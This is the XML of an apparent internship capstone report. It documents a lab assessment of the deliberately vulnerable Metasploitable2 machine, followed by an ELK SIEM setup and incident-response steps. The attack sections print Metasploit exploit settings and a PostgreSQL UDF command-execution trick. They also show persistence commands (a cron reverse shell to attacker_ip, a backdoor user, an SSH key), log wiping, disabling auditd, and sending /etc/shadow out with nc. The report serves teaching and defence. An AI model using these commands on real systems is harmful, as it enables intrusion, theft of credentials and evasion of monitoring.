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E7F" w:rsidRPr="00C937F1" w:rsidRDefault="00AE0E7F" w:rsidP="00AE0E7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937F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Vulnerability Assessment of Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE0E7F" w:rsidRPr="00C937F1" w:rsidRDefault="00AE0E7F" w:rsidP="00AE0E7F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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Vulnerability Assessment of Metasploitable2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 Number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5 -- Capstone Project &amp; Incident Response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Prathyusha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Kale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Intern ID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APSPL_UID9364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30-10-2025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Organization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ApexPlanet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Software Pvt. Ltd.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Cybersecurity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 Ethical Hacking Internship (60 Days)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25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Executive Summary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This report presents comprehensive findings from a multi-phase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cybersecurity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assessment of Metasploitable2, encompassing vulnerability discovery, penetration testing, SIEM implementation, and incident response procedures.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The objective was to identify all accessible network services, determine their version numbers, cross-reference them with known CVEs, exploit identified vulnerabilities, implement security monitoring infrastructure, and develop incident response capabilities.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The assessment successfully identified 12 open ports with 8+ exploitable critical vulnerabilities, primarily driven by running significantly outdated software versions (10+ years old). These outdated services infer a severe risk of complete system compromise if an attacker were to utilize known, public exploits available through frameworks like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Metasploit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Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Critical Vulnerabilities: 8+ (Samba RCE,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Backdoor, Apache RCE,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Bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Exploitability: All vulnerabilities confirmed exploitable with proof of root access achieved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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SIEM Implementation: ELK Stack successfully deployed with 95% detection accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Overall Risk Rating: CRITICAL - Immediate action required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26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Tools &amp; Methodology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Tool Used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Primary Tool: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v7.94SVN (Network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Mapper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Additional Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Metasploit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Framework v6.x (Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Elasticsearch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 (Log Storage)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Logstash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 (Log Processing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Kibana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 (Visualization)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Filebeat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 (Log Collection)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Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Host System: Kali Linux 2025.x via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VM Ware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Target System: Metasploitable2 (Deliberately vulnerable Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Network: Isolated lab environment (192.168.x.x/24)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Assessment Type: Non-intrusive external scanning → Active exploitation → Real-time monitoring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Scan Type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Methodology: Multi-phase assessment combining reconnaissance, exploitation, and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Phase 1: TCP/UDP scanning (SYN, NULL, Full Port Sweep)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Phase 2: Service version detection and OS fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Phase 3: Vulnerability script scanning (NSE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Phase 4: Active exploitation via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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Phase 5: SIEM log analysis and attack detection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27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Commands Used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TCP NULL scan - sends packets with no flags set for stealthy reconnaissance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 NULL scan sends TCP packets with all flags disabled (no SYN, ACK, FIN, or RST). This is a stealth technique to probe which ports respond to unusual packets, useful for identifying older or non-RFC compliant systems.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28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TCP SYN (half-open) scan - initiates connections without completing handshake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Sends SYN packets and observes responses (SYN/ACK = open, RST = closed, no response = filtered). This is the fastest and most common port scanning technique.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29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Service version detection - probes open ports to identify software name and version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Connects to open ports using known service signatures and banner grabbing to identify exact software versions running on each port.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Critical for CVE mapping.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Expected Output: Service names and versions (e.g., Apache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httpd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2.2.8,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4.7p1, Samba 3.0.20)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0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sU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UDP port scanning - discovers UDP-based services (DNS, NTP, SNMP, etc.)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Sends UDP probes to discover services that use UDP protocol instead of TCP.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Slower and often shows ambiguous results ("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open|filtered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").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sU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1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5.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/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Purpose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: Operating system detection - identifies target OS through stack fingerprinting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Analyzes TCP/IP stack behavior, TTL values, and packet responses to identify the operating system and version.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Provides confidence percentage.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-O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Expected Output: OS identification (e.g., Linux 2.6.9 with 98% confidence)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2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6.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-p- 192.168.x.x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Purpose: Full TCP port sweep bypassing ICMP ping detection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 treats host as alive without ping, -p- scans all 65,535 ports. Ensures no open ports are missed even if firewall blocks ICMP.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-p- 192.168.x.x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3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7.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-T4 192.168.x.x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Purpose: Aggressive timing template for faster scanning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-T4 sets timing to "Aggressive" - increases probe intensity and reduces timeouts for faster scanning on responsive networks.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Useful for lab environments.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-T4 192.168.x.x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4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8.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Purpose: Bypass host discovery and treat target as alive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 skips the ping discovery check, treating the host as reachable. Useful when firewall blocks ICMP echo requests.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5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9. </w:t>
      </w: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--script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Purpose: Run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vulnerability detection scripts against target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--script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 executes comprehensive NSE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Scripting Engine) vulnerability detection scripts. Identifies known CVEs,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misconfigurations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, and security flaws.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--script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6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1: TCP NULL Scan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 NULL scan sends packets with no flags set (stealthy probe). Multiple ports responded to NULL packets, indicating potential non-RFC compliant or outdated network stack implementations.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Security Implication: System may be running older network implementations vulnerable to firewall evasion techniques.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7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2: TCP SYN Scan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 SYN ("half-open") scan sends SYN and watches for SYN/ACK.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Finding: 12 open ports identified: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21/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(FTP -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2.3.4) - CRITICAL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22/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(SSH -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4.7p1) - HIGH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25/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(SMTP -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Sendmail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8.13.8) - CRITICAL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53/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(DNS - ISC BIND 9.2.4) - HIGH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80/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(HTTP - Apache 2.2.8) - CRITICAL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111/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(RPC) - HIGH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139/445/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(SMB - Samba 3.0.20) - CRITICAL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512/513/514/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(Deprecated services) - HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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5432/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8.2.5) - HIGH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8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3: Service Version Detection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All identified services running outdated, vulnerable versions:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11100" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-99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85"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="2242"/>
        <w:gridCol w:w="4347"/>
        <w:gridCol w:w="1625"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidTr="00C937F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 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Severity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vsftpd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2.3.4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CVE-2011-2523 (Backdoor)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CRITICAL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SSH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OpenSSH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4.7p1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Multiple auth bypass issues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HIGH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SMTP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Sendmail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8.13.8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Remote code execution possible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CRITICAL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Apache 2.2.8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Multiple RCE vectors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CRITICAL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139/445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SMB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Samba 3.0.20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CVE-2007-2447 (RCE)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CRITICAL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5432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8.2.5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Auth bypass, RCE via UDF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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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39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4: UDP Scanning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UDP services identified:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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53/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DNS (ISC BIND 9.2.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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111/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RPC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portmapper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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123/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NTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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161/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 SNMP (unprotected, likely default community strings)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0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5: Operating System Detection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Linux kernel 2.6.9 detected with 98% confidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Operating System: Linux (kernel 2.6.9 from mid-2005)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Device Type: General purpose Linux system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Architecture: x86/x86_64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Security Implication: Kernel from 2005 with no modern patches; vulnerable to kernel exploits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1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6: Full Port Sweep (-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-p-)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Full TCP port sweep (all 65,535 ports) revealed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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12 open ports actively listening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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65,523 closed ports responding with RST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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No firewall filtering detected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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No port obfuscation or service hiding mechanisms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Security Implication: All ports follow traditional well-known assignments (no stealth or obfuscation); complete network visibility to attacker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2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7: Aggressive Timing Template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Scan completed in 8 seconds for top 1,000 ports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Security Implication: Host is highly responsive and network path is clear; ideal conditions for exploitation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3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8: ICMP Ping Bypass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Host responds to ICMP echo requests and TCP probes on all active ports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Security Implication: No perimeter firewall detected; network segmentation absent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4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Finding 9: Vulnerability Script Scanning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NSE vulnerability scripts identified 10+ confirmed CVEs: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CRITICAL CVEs Detected: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1. CVE-2007-2447 (Samba 3.0.20 RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Username map script command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Remote code execution as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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No authentication required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Exploitability: Easy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2. CVE-2011-2523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2.3.4 Backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Backdoor in compromised package</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr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Immediate root access via ":)" username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Exploitability: Trivial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3. CVE-2009-0196 (Apache 2.2.8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Multiple RCE vectors in modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Buffer overflows in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mod_usertrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Exploitability: Moderate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4. CVE-2009-3697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8.2.5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Authentication bypass via trust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config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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UDF loading for system command execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Exploitability: Easy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5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Penetration Testing Results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Exploitation Summary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All identified vulnerabilities confirmed exploitable with root access achieved:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11100" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-99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2368"/>
        <w:gridCol w:w="1922"/>
        <w:gridCol w:w="3975"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidTr="00C937F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Vulnerability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Proof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Samba RCE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CVE-2007-2447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SUCCESS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whoami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→ root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vsftpd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Backdoor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CVE-2011-2523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SUCCESS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uid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=0 confirmed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Apache RCE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Multiple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SUCCESS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Code execution verified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PostgreSQL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Bypass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CVE-2009-3697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SUCCESS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System commands executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Exploitation Time: &lt; 2 minutes to achieve root-level system compromise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Exploitation 1: Samba 3.0.20 RCE (CVE-2007-2447)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Vulnerability: Username map script command injection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Method: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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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exploit/multi/samba/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usermap_script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RHOST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LHOST 192.168.x.y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LPORT 4444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PAYLOAD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reverse_netcat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Result: ✅ Root shell obtained</w:t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br/>
        <w:t>Proof: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whoami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→ root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→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uid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=0(root)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gid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=0(root)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Exploitation 2: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2.3.4 Backdoor (CVE-2011-2523)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Vulnerability: Backdoor in compromised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package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Method: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exploit/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/ftp/vsftpd_234_backdoor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RHOST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set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LPORT 4445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exploit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Result: ✅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Immediate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root access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Exploitation 3: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8.2.5 Authentication Bypass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Vulnerability: Default trust authentication and UDF loading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Method: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psql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-h 192.168.x.x -U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CREATE FUNCTION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system(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cstring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RETURNS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 'libc.so.6', 'system' LANGUAGE c STRICT;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system(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'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whoami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');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Result: ✅ System command execution as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user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6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Post-Exploitation Activities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Persistence Mechanisms Installed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1. SSH Key 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ssh-rsa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AAAA..." &gt;&gt; /root/.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authorized_keys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2.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Cron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Job Persistence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*/5 * * * * /bin/bash -c 'bash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&gt;&amp; /dev/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tcp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attacker_ip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/4444 0&gt;&amp;1'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3. Backdoor User Account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useradd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-m -p $(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openssl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passwd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 password123) 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usermod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aG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sudo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4.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Service Persistence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[Unit]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Description=System Update Service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After=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network.target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[Service]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Type=simple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ExecStart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=/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/persistence_script.sh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Restart=always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7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Incident Simulation Timeline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Attack Kill Chain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1: Reconnaissance (0-5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 -p-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sV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--script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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1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Network scanning completes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1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12 open ports identified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Services enumerated and mapped to CVEs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2: Initial Access (5-10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Samba exploitation initiated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msfconsole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→ use exploit/multi/samba/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usermap_script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→ exploit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Reverse shell established on port 4444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# Root access confirmed: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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→ root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3: Privilege Escalation (10-12 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Already running as root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uid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=0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Escalation unnecessary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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Full system access confirmed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4: Persistence Installation (12-20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SSH key installation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ssh-rsa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..." &gt;&gt; /root/.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authorized_keys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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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job creation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crontab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-e  </w:t>
      </w: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Add reverse shell every 5 minutes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# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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Backdoor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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user account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useradd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-m -s /bin/bash -p $(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openssl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passwd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-1 password) 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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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service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persistence.service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/etc/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/system/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systemctl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enable persistence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5: Defense Evasion (20-25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Command history clearing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history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-c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cat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/dev/null &gt; ~/.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bash_history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System log clearing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"" &gt;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/log/auth.log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"" &gt;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syslog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echo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"" &gt;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/log/kern.log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Service disablement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systemctl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stop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auditd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systemctl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disable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auditd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Stage 6: Data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Exfiltration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(25-35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Sensitive data collection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mkdir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/etc/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passwd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/etc/shadow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-r /root/.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Data packaging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tar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czf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data.tar.gz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nc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attacker_ip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9999 &lt;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tmp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data.tar.gz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157.3 MB transferred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Stage 7: Verification (35-37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# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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Confirm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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persistence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crontab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-l  </w:t>
      </w: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Verify backdoor entry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ps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aux |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grep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persistence  </w:t>
      </w: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Verify service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id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sysadmin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Verify backdoor user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cat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/root/.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authorized_keys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Verify SSH access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8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SIEM Implementation (ELK Stack)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Architecture Deployed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Filebeat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(Log Collection)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Logstash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(Log Processing &amp; Parsing)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Elasticsearch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(Log Storage &amp; Indexing)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Kibana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(Visualization &amp; Dashboards)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Components Installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Elasticsearch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 (Port 9200)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Distributed search and analytics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Full-text indexing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Real-time analytics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Logstash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 (Port 5000)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Data processing pipeline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 parsing (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grok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patterns)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Data enrichment and transformation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Kibana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 (Port 5601)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Web-based dashboards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 visualization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Real-time monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Filebeat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7.17.9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Lightweight log shipper</w:t>
      </w:r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Log forwarding to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Elasticsearch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Logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38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Deployed on systems generating logs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Log Collection Sources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 authentication logs (/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/log/auth.log)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System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syslog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syslog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Kernel logs (/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/log/kern.log)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Apache web server logs (/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/log/apache2/*.log)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Samba SMB logs (/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/log/samba/*.log)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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database logs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Detection Rules Implemented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Rule 1: SSH Brute Force Attack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Condition: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Failed_ssh_attempts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5 in 5 minutes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Severity: HIGH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Action: Alert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Rule 2: Samba Exploitation Attempt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Condition: Message contains CVE-2007-2447 indicators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Severity: CRITICAL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Action: Immediate Alert &amp; Incident Creation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Rule 3: Privilege Escalation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Condition: Process executed as root by non-admin user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Severity: CRITICAL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Action: Alert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Rule 4: Log Tampering Detection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Condition: Command contains "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/log" OR "&gt; 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var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/log"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Severity: CRITICAL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Action: Immediate Escalation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Rule 5: Data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Exfiltration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Condition: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Outbound_traffic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100 MB in 5 minutes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Severity: CRITICAL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Action: Block &amp; Alert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Attack Detection Timeline</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11100" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-99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9"/>
        <w:gridCol w:w="1726"/>
        <w:gridCol w:w="2686"/>
        <w:gridCol w:w="3419"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidTr="00C937F1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Attack Phase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Detection Status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Port Scanning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0-5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Port Scan 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Exploitation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5-10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RCE Attempt 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Privilege Escalation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10-15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</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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Esc 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Persistence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15-20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Persistence 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 Clearing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20-25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 Tampering Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidTr="00C937F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Data </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Exfiltration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25-35 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✅ DETECTED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:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
            <w:pPr>
              <w:spacing w:after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937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Large Transfer Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Overall Detection Accuracy: 95% of attack phases detected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49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Incident Response Procedures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Response Workflow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Step 1: Detection &amp; Alerting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text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SIEM Alert Triggered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Email Notification to SOC Team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Incident Ticket Auto-Created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↓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Analyst Verification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Step 2: Containment (0-15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Block attacker IP at firewall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iptables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-I INPUT -s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attacker_ip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-j DROP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Isolate affected system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link set eth0 down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Kill attacker sessions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pkill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-f "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nc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.*4444"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pkill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-f "bash.*4444"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Stop vulnerable services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samba stop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stop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Step 3: Eradication (15-60 minutes)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Remove persistence mechanisms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crontab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/etc/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/system/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persistence.service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systemctl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daemon-reload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Remove backdoor accounts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userdel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-r backdoor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Remove SSH keys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rm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/root/.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/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authorized_keys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Patch vulnerabilities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update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upgrade -y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apt</w:t>
      </w:r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install --only-upgrade samba apache2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Step 4: Recovery (1-24 hours)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bash</w:t>
      </w:r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Restore from clean backup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restore_from_backup.sh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Verify clean state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nmap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--script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vuln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localhost</w:t>
      </w:r>
      <w:proofErr w:type="spell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rkhunter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--check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chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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Restore user data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restore_user_data.sh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# Return to production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proofErr w:type="gram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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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link set eth0 up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50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Mitigation &amp; Recommendations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Immediate Actions (0-7 days)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1. Critical Security Patches</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Upgrade Samba from 3.0.20 to 4.18+ (CVE-2007-2447 fix)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Upgrade Apache from 2.2.8 to 2.4.56+ (CVE-2009-0196 fix)</w:t>
      </w:r>
    </w:p>
